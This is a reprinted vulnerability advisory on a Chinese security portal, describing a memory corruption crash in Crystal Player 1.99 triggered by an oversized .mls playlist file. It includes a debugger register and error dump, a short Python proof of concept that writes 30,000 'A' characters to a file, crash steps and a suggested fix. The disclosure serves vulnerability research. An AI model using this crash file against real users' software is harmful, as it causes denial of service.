首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Crystal Player 1.99 - Memory Corruption Vulnerability 来源：Haxinos 作者：Soni 发布时间：2015-01-26   Document Title: =============== Crystal Player 1.99 - Memory Corruption Vulnerability Date: ============= 21/01/2015 Vendor Homepage: ================ http://www.crystalreality.com/ Abstract Advisory Information: ============================== Memory Corruption Vulnerability on Crystal Player 1.99. Affected Product(s): ==================== Crystal Player 1.99 Exploitation Technique: ======================= Local Severity Level: =============== Medium Technical Details & Description: ================================ A Memory Corruption Vulnerability is detected on Crystal Player 1.99. An attacker can crash the software by using .mls file. Attackers can crash the software local by user inter action over mls (playlist). --- DEBUG LOG --- ///registers EAX 00000000 ECX 0006FE24 EDX 0006FE24 EBX 0013014C ESP 0006F300 EBP 00060041 ESI 00FF4A00 EDI 00000001 EIP 0040F933 Crystal.0040F933 C 0  ES 0023 32bit 0(FFFFFFFF) P 1  CS 001B 32bit 0(FFFFFFFF) A 1  SS 0023 32bit 0(FFFFFFFF) Z 0  DS 0023 32bit 0(FFFFFFFF) S 1  FS 003B 32bit 7FFDE000(FFF) T 0  GS 0000 NULL D 0 O 0  LastErr ERROR_NOT_ENOUGH_MEMORY (00000008) EFL 00010296 (NO,NB,NE,A,S,PE,L,LE) ST0 empty ST1 empty ST2 empty ST3 empty ST4 empty ST5 empty ST6 empty ST7 empty                3 2 1 0      E S P U O Z D I FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT) FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1 --- ERROR LOG --- Crystal+0xf933: 0040f933 8b5510          mov     edx,dword ptr [ebp+10h] ss:0023:00060051=???????? 00060051 doesnt exist in the program aka not allowed .. so memcopy fails... EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff) ExceptionAddress: 0040f933 (Crystal+0xf933) Access violation when reading [00060051] Proof of Concept (PoC): ======================= This vulnerabilities can be exploited by local attackers with userinteraction ... #!/usr/bin/python buffer = "A"*30000 filename = "Crash"+".mls" file = open(filename, 'w') file.write(buffer) file.close() print "[] Successfully MLS Created []" How to perform: ======================= 1) Open Immunity Debugger and attach Crystal Player 1.99 2) Run it, Now move .mls file that we generated by our python script to the player 3) Once again you have to move the same file in Crystal Player 1.99 for adding second playlist. When you perform above steps so application will crash. Analyze it on Immunity. Solution - Fix & Patch: ======================= Restrict working maximum size & set a own exception-handling for over-sized requests. Security Risk: ============== The security risk of the vulnerability is estimated as medium because of the local crash method. Authors: ================== Kapil Soni (Haxinos)   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Arris VAP2500 tools_command.ph ·Windows < 8.1 (32/64 bit) - Pr ·Symantec SDCS:SA / SCSP XSS / ·libpng 1.6.15 Heap Overflow Ex ·Exif Pilot 4.7.2 Buffer Overfl ·Cisco Ironport Appliances Priv ·GetGo Download Manager HTTP Re ·Zhone GPON 2520 R4.0.2.566b - ·Microsoft Windows NtApphelpCac ·Android WiFi-Direct Denial of ·OS X 10.9.5 IOKit IntelAcceler ·Comodo Backup 4.4.0.0 - NULL P   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved